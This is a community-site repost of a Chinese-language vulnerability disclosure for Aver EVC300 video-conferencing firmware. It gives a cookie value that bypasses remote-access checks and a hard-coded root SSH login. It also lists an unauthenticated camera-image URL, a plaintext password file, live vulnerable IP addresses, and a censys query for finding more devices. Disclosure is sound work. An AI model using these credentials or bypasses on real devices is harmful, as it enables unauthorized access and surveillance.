前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Aver EVC300(多点视频会议系统)v00.10.16.36 硬编码

Aver EVC300(多点视频会议系统)v00.10.16.36 硬编码

原创
作者头像
Khan安全团队
发布2021-12-22 14:47:48
5800
发布2021-12-22 14:47:48
举报
文章被收录于专栏:Khan安全团队Khan安全团队
代码语言:javascript
复制
Aver EVC300(多点视频会议系统)v00.10.16.36 和其他固件(以及 Aver 制造的其他几种设备的固件,可能都是多点视频会议系统)包含多项未详细记录的高级功能:

1. 即使 Web 管理被禁用,Web 管理服务器仍会继续运行。检查访问是设备本地访问还是远程访问是使用特定 cookie 在 Javascript 中完成的。
通过在页面加载期间按如下方式设置 cookie:

document.cookie="VnsSuperPassword=#qC9,kD:;CupSuperPassword=fu.1u3wk4;"
可以绕过远程访问限制,并使用“本地”用户界面。

2. 一旦绕过“访问限制”,就可以启用正常的远程访问。也可以通过设置重置管理员密码
使用 JS 调试将 adminPwd.js 中的 Javascript 变量(我们可用版本中的变量名称 j)设置为 1。这将禁用要求输入先前密码的安全检查。
这个功能显然是一个让孩子熟悉浏览器调试控制台的教育工具。

3. URL <EVC300 IP>/monitor/monitor.jpg 无论认证状态如何都可以访问,并根据设备状态显示设备所连接的监视器或相机的低分辨率图像。
旧版本的固件使用 URL "rimg/monitor.jpg"

4. 设备有 ssh 守护进程(dropbear,其他设备上的其他人)监听端口 1587、1588 和 1589。
它还有一个硬编码帐户 avermediainfo,密码为 avi2008,在设备上具有 root 权限。

1587/tcp 打开 ssh syn-ack ttl 63 Dropbear sshd 2013.60(协议 2.0)
1588/tcp 打开 ssh syn-ack ttl 62 Dropbear sshd 2013.60(协议 2.0)
1589/tcp 打开 ssh syn-ack ttl 62 Dropbear sshd 2013.60(协议 2.0)

5.通过ssh访问设备,可以读取文件/mnt/others/var/Olympus/Athena.ini,其中管理员密码以明文形式存储(“1234”为默认密码):
密码=“*****”
PPPoEPassword="平均"
SIPTerminalPassword=""
SIPServerPasswordOn=Y
SIPServerPassword="1234"
IwbPw="1234"
访问代码=“1234”
RegGatekeeperPwd=""
这对于忘记管理员密码并且不想打扰 JS 控制台的人来说非常方便。

6. 截至撰写本文时,上述功能可以在站点 vcdemo.aver.com (61.219.195.10) 以及同一范围内的其他几个 IP 地址(例如 61.219.195.23)上使用。
额外的寓教于乐端点可以通过使用 Nmap 找到,或者,例如,通过使用 censys.io 搜索 HTML 标题(services.http.response.html_title="Video Conference"),然后检查生成的 IP 地址。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
智慧会务
腾讯云智慧会务(Tencent Cloud Conference) 是一款为活动管理赋能一站式办展能力的自研产品,结合腾讯生态能力使活动管理组织在线化、数字化、高效化。当前已在展会、商业会议、教育、旅游等垂直领域行业形成成熟的方案。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档